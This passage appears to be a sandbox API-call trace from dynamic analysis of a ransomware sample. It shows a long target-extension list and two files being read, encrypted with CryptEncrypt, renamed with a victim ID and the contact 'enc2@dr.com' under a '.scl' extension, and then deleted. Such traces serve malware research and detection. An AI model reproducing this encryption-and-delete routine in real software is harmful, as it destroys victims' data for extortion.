.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.857] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.857] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.857] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.861] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3ba5, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x3ba5, lpOverlapped=0x0) returned 1
	[0182.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.863] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0182.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.865] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0182.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.866] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.866] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9230) returned 1
	[0182.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.866] CryptEncrypt (in: hKey=0xfb9230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x3ba5, dwBufLen=0x3ba5 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x3bb0) returned 1
	[0182.867] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.867] RtlMoveMemory (in: Destination=0xfe0d30, Source=0xfdd180, Length=0x3ba5 | out: Destination=0xfe0d30) 
	[0182.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.867] CryptEncrypt (in: hKey=0xfb9230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0d30*, pdwDataLen=0x18aefc*=0x3ba5, dwBufLen=0x3bb0 | out: pbData=0xfe0d30*, pdwDataLen=0x18aefc*=0x3bb0) returned 1
	[0182.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.868] CryptDestroyKey (hKey=0xfb9230) returned 1
	[0182.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.868] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0182.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.869] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0182.869] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.869] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.870] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0182.872] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 99
	[0182.872] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0182.872] WriteFile (in: hFile=0x390, lpBuffer=0xfe0d30*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe0d30*, lpNumberOfBytesWritten=0x18b358*=0x3bb0, lpOverlapped=0x0) returned 1
	[0182.876] CloseHandle (hObject=0x390) returned 1
	[0182.876] CloseHandle (hObject=0x388) returned 1
	[0182.876] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a")) returned 1
	[0182.880] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\yipzjstuvo.m4a")) returned 0
	[0182.880] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e44760, ftCreationTime.dwHighDateTime=0x1d973dd, ftLastAccessTime.dwLowDateTime=0xa2b0d930, ftLastAccessTime.dwHighDateTime=0x1d97615, ftLastWriteTime.dwLowDateTime=0xa2b0d930, ftLastWriteTime.dwHighDateTime=0x1d97615, nFileSizeHigh=0x0, nFileSizeLow=0x141c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="z02M6KpVHTJ.rtf", cAlternateFileName="Z02M6K~1.RTF")) returned 1
	[0182.880] lstrcmpW (lpString1="z02M6KpVHTJ.rtf", lpString2="..") returned 1
	[0182.880] lstrcmpW (lpString1="z02M6KpVHTJ.rtf", lpString2=".") returned 1
	[0182.880] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\"
	[0182.880] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\", lpString2="z02M6KpVHTJ.rtf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\z02M6KpVHTJ.rtf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\z02M6KpVHTJ.rtf"
	[0182.880] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\z02M6KpVHTJ.rtf") returned 58
	[0182.881] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.881] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\z02M6KpVHTJ.rtf", cchLength=0x3a | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf") returned 0x3a
	[0182.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.881] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.881] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf"
	[0182.881] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf") returned 58
	[0182.881] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.882] StrStrW (lpFirst=".rtf", lpSrch=".") returned=".rtf"
	[0182.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.882] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rtf") returned=".rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.882] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.883] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.883] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.884] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x141c9, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x141c9, lpOverlapped=0x0) returned 1
	[0182.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.889] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0182.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.891] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0182.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.892] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.893] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9470) returned 1
	[0182.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.893] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x141c9, dwBufLen=0x141c9 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x141d0) returned 1
	[0182.895] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.896] RtlMoveMemory (in: Destination=0xff1358, Source=0xfdd180, Length=0x141c9 | out: Destination=0xff1358) 
	[0182.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.896] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff1358*, pdwDataLen=0x18aefc*=0x141c9, dwBufLen=0x141d0 | out: pbData=0xff1358*, pdwDataLen=0x18aefc*=0x141d0) returned 1
	[0182.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.897] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0182.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.898] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0182.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.898] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0182.898] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.898] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.899] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0182.900] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 100
	[0182.900] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0182.901] WriteFile (in: hFile=0x390, lpBuffer=0xff1358*, nNumberOfBytesToWrite=0x141d0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff1358*, lpNumberOfBytesWritten=0x18b358*=0x141d0, lpOverlapped=0x0) returned 1
	[0182.906] CloseHandle (hObject=0x390) returned 1
	[0182.906] CloseHandle (hObject=0x388) returned 1
	[0182.907] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf")) returned 1
	[0182.914] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\z02m6kpvhtj.rtf")) returned 0
